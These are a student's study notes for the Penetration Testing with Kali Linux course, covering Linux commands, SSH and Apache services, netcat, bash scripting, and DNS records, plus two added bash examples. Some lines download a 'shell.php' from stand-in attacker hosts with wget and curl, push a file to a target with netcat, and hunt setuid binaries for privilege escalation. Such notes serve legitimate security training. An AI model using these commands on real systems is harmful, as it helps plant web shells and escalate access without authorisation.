# PENTESTING NOTES

RULES

1. MUST FOLLOW THE LEARNING PYRAMID
2. MUST ADHERE TO RULE #1
3. TRY HARDER
4. DRINK WATER

# INTRODUCING MYSELF

> I am Moses Ateka alias *0x11/VJ XI*, cybersecurity student, gamer and one hell of a loser. I am currently doing penetration testing as a full-time profession.
> I like playing CTFs, solving labs and interacting with different people. *Hope I will get through this.*

# Penetration Testing With Kali Linux

> PWK is a basic course in penetration testing. Those who are new to Offensive Security courses should start with this course. It introduces penetration testing tools and methods through hands-on experience.

# KICK OFF!!!

# Finding My Way Around Kali

Kali Linux adheres to the Filesystem Hierarchy Standard (FHS), which gives every Linux user a familiar and universal layout. The most useful directories:

* **/bin** - basic programs (ls, cat; `cd` is a shell builtin, not a binary in /bin)
* **/sbin** - system programs (fdisk, sysctl)
* **/etc** - configuration files
* **/tmp** - temporary files
* **/usr/bin** - applications (nmap, ncat)
* **/usr/share** - application support data files (wordlists, windows-binaries)

# Basic Linux commands

# > man pages

* Most executable programs intended for the Linux command line ship with a formal piece of documentation, the manual or man page. ex:

```
man ls
```

# > apropos

* With this command we search the man page descriptions for matches on a keyword, useful when we know what we want to do but not which tool does it. ex:

```
apropos partition
```

# > Listing files

* The *ls* command prints a basic file listing to the screen. `-a` includes hidden (dot) files, `-l` gives the long format with permissions, owner, size and timestamp, and `-t` sorts by modification time, newest first. ex:

```
ls ~/Documents
```

```
ls -al
```

```
ls -lt
```

# > Moving around

* All files and folders are children of the root directory, represented by the "/" character.
* We use the *cd* command followed by a path to change the working directory. ex:

```
cd ~/Downloads
```

```
cd /usr/share/wordlists/
```

* The *pwd* command prints our current working directory, which comes in handy if you are lost.
# > Creating directories

* The *mkdir* command followed by the name of a directory creates the specified directory.
* *mkdir -p* also creates any missing parent directories, and combined with bash brace expansion it creates several directories at once. Keep the slash before the braces: `test{recon,exploit,report}` would expand to `testrecon`, `testexploit` and `testreport` instead of three subdirectories of `test`.

```
mkdir -p test/{recon,exploit,report}
```

# > Finding files

* There are 3 main commands used to find files in Linux:

1. find - walks the filesystem from a starting directory and tests each entry against criteria such as name, type, permissions or modification time
2. locate - queries a prebuilt index of filenames, so it is fast but only as current as the last `updatedb` run
3. which - looks up where an executable lives in the directories of `$PATH`

* find is the most complex and flexible of the three.

# Managing Kali Linux Services

# > SSH service

* Secure Shell (SSH) is used mostly to access a computer remotely over an encrypted protocol.
* It is TCP-based and listens by default on port 22.
* To start SSH we use *systemctl* with the *start* option followed by the service name:

```
sudo systemctl start ssh
```

* To have the service started at boot time, which most people prefer, use *enable*. Change the default password of the kali user first: an SSH server reachable with well-known credentials is an open door into your own box.

```
sudo systemctl enable ssh
```

# > HTTP service

* The Apache HTTP service is often used during a pentest to host files (tools, payloads) for download onto a victim machine; anything placed under /var/www/html is served.
* It is also TCP-based and listens on port 80 by default.

```
sudo systemctl start apache2
```

```
sudo systemctl enable apache2
```

> That winds up my interaction with Kali; the rest I am confident enough with.
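A worked example of the directory and file-finding commands above, added here as an illustration and not part of the original notes or the PWK course material: it builds a throwaway engagement tree with mkdir -p (a portable loop is used so the script also runs under plain sh; in bash the brace-expansion form `mkdir -p "$scratch"/{recon,exploit,report}` does the same), plants a few files including one with the setuid bit, and locates them with find by permission, age and name. Every path, file name and file content is constructed for the demo.

```bash
#!/bin/bash
# Added example, not from the original notes: exercise mkdir -p and find on a
# scratch tree. All paths and file contents below are constructed for the demo.

# Build recon/, exploit/ and report/ under $1. In bash this is what
#   mkdir -p "$1"/{recon,exploit,report}
# expands to; the loop form works in any POSIX shell.
make_engagement_tree() {
    scratch="$1"
    for d in recon exploit report; do
        mkdir -p "$scratch/$d"
    done
    printf 'root:x:0:0::/root:/bin/bash\n' > "$scratch/recon/passwd.txt"
    printf '#!/bin/sh\nid\n' > "$scratch/exploit/priv.sh"
    chmod u+s,a+x "$scratch/exploit/priv.sh"   # setuid bit: the classic privesc candidate
    printf 'draft\n' > "$scratch/report/notes.md"
}

# Files with the setuid bit set below $1, sorted. On a real target this is
#   find / -type f -perm -4000 2>/dev/null
find_suid() {
    find "$1" -type f -perm -4000 2>/dev/null | sort
}

# Files modified in the last $2 minutes below $1: freshly dropped artefacts.
find_recent() {
    find "$1" -type f -mmin "-$2" 2>/dev/null | sort
}

# Case-insensitive filename match ($2 is a glob such as 'passwd*').
find_by_name() {
    find "$1" -type f -iname "$2" 2>/dev/null | sort
}

# Demo run against a temporary directory, cleaned up afterwards.
demo_dir=$(mktemp -d)
make_engagement_tree "$demo_dir"
echo "setuid files:";       find_suid "$demo_dir"
echo "changed <5 min ago:"; find_recent "$demo_dir" 5
echo "passwd copies:";      find_by_name "$demo_dir" 'passwd*'
echo "nmap lives at:";      which nmap || echo "(nmap not installed here)"
rm -rf "$demo_dir"
```

The `2>/dev/null` on each find matters on a real box: without it, every directory you cannot read floods the output with "Permission denied" lines and hides the hits.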
# Downloading files

# > wget

* Used extensively to download files over the HTTP, HTTPS and FTP protocols. By default the file is saved under the name in the URL.

```
wget http://adversary.net/shell.php
```

# > curl

* Used to transfer data to and from a server over many protocols, including HTTP, HTTPS, FTP, SMB, POP3, IMAP and TELNET. curl writes to stdout unless `-o` names an output file:

```
curl -o shell.php http://adversary.com/shells/shell.php
```

---

# Practical Tools

# > Netcat

* The Swiss army knife of hacking.
* Reads and writes data across network connections, using TCP or UDP.

Connecting to a TCP port (`-n` skips DNS resolution, `-v` is verbose); the banner that comes back identifies the service:

```
nc -nv 69.69.69.69 22
```

Listening on a TCP port (`-l` listen, `-p` port; add `-u` for UDP):

```
nc -nlvp 6969
```

Transferring files with netcat. Start the listener on the receiving side first, then connect from the sender to the same port.

* on target machine (receiver)

```
nc -nlvp 4444 > incoming.exe
```

* on adversary machine (sender)

```
nc -nv 69.220.133.69 4444 < /usr/share/windows-binaries/wget.exe
```

Netcat gives no progress or completion signal: once the sender's input is exhausted, close the connection (Ctrl+C) and compare a hash of both copies to confirm the transfer is complete.

---

# Bash scripting

> A Bash script is a plain-text file that contains a series of commands that are executed as if they had been typed at a terminal prompt.

* Bash scripts have an optional *.sh* extension for easy identification.
* The script should begin with the shebang line *#!/bin/bash*, and the file must have the executable permission set (chmod +x) before it can be run directly.

# Active information gathering

* This includes port scanning and DNS, SMB, NFS, SMTP and SNMP enumeration.

# > DNS enumeration

* The Domain Name System (DNS) is one of the most critical systems on the Internet: a distributed database responsible for translating user-friendly domain names into IP addresses.

# > Common DNS records

* NS - nameserver records, the authoritative servers for the zone
* A - host record, mapping a name to an IPv4 address
* MX - mail exchange record, the mail servers for the domain with a preference value (lowest is tried first)
* PTR - pointer records, the reverse mapping from an IP address back to a name
* CNAME - Canonical Name records, used to create aliases for other host records
* TXT - text records, free-form data such as SPF policies and domain-verification strings
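To tie the Bash scripting notes and the DNS record types together, here is an added example (mine, not from the original notes or the course) of a bash script that sorts the records of a captured zone transfer by type and pulls out what a pentester looks for first: the mail servers in priority order and any internal addresses leaking through public DNS. The zone data is constructed inline in the dig-style layout (name, TTL, class, type, data); example.com and the 192.0.2.0/24 addresses are reserved documentation values, not real targets, and in practice the variable would hold the output of a real lookup or zone transfer.

```bash
#!/bin/bash
# Added example, not from the original notes: parse zone-transfer style output
# and group it by record type. The zone below is constructed for the demo
# (example.com and 192.0.2.0/24 are reserved documentation values).
# Each line has the dig-style layout: name  TTL  class  type  data...
ZONE='example.com.              3600 IN SOA   ns1.example.com. hostmaster.example.com. 2024010101 3600 900 604800 86400
example.com.              3600 IN NS    ns1.example.com.
example.com.              3600 IN NS    ns2.example.com.
example.com.              3600 IN MX    20 mail2.example.com.
example.com.              3600 IN MX    10 mail1.example.com.
example.com.              3600 IN TXT   "v=spf1 mx -all"
ns1.example.com.          3600 IN A     192.0.2.1
ns2.example.com.          3600 IN A     192.0.2.2
mail1.example.com.        3600 IN A     192.0.2.10
mail2.example.com.        3600 IN A     192.0.2.11
www.example.com.          3600 IN CNAME web01.example.com.
web01.example.com.        3600 IN A     192.0.2.20
intranet.example.com.     3600 IN A     10.0.0.5
1.2.0.192.in-addr.arpa.   3600 IN PTR   ns1.example.com.'

# Print "name data..." for every record of type $1 (NS, A, MX, PTR, CNAME, TXT).
records_of_type() {
    printf '%s\n' "$ZONE" | awk -v t="$1" '
        $4 == t { out = $1; for (i = 5; i <= NF; i++) out = out " " $i; print out }'
}

# Mail servers ordered by MX preference, lowest (most preferred) first.
mail_servers() {
    records_of_type MX | sort -k2,2n | awk '{ print $3 }'
}

# A records that point into RFC 1918 space: internal hosts leaking through public DNS.
internal_hosts() {
    records_of_type A | awk '$2 ~ /^10\./ || $2 ~ /^192\.168\./ || $2 ~ /^172\.(1[6-9]|2[0-9]|3[01])\./ { print $1 }'
}

# How many records of each type the zone holds.
count_by_type() {
    printf '%s\n' "$ZONE" | awk '{ c[$4]++ } END { for (t in c) print t, c[t] }' | sort
}

# Demo run over the constructed zone.
for rtype in NS A MX PTR CNAME TXT; do
    echo "== $rtype =="; records_of_type "$rtype"
done
echo "== mail servers by priority =="; mail_servers
echo "== internal hosts =="; internal_hosts
echo "== record counts =="; count_by_type
```

The only parsing assumption is the five-column layout, so the same functions work on anything that prints records that way; the record type always sits in column four, which is why every function keys on `$4`.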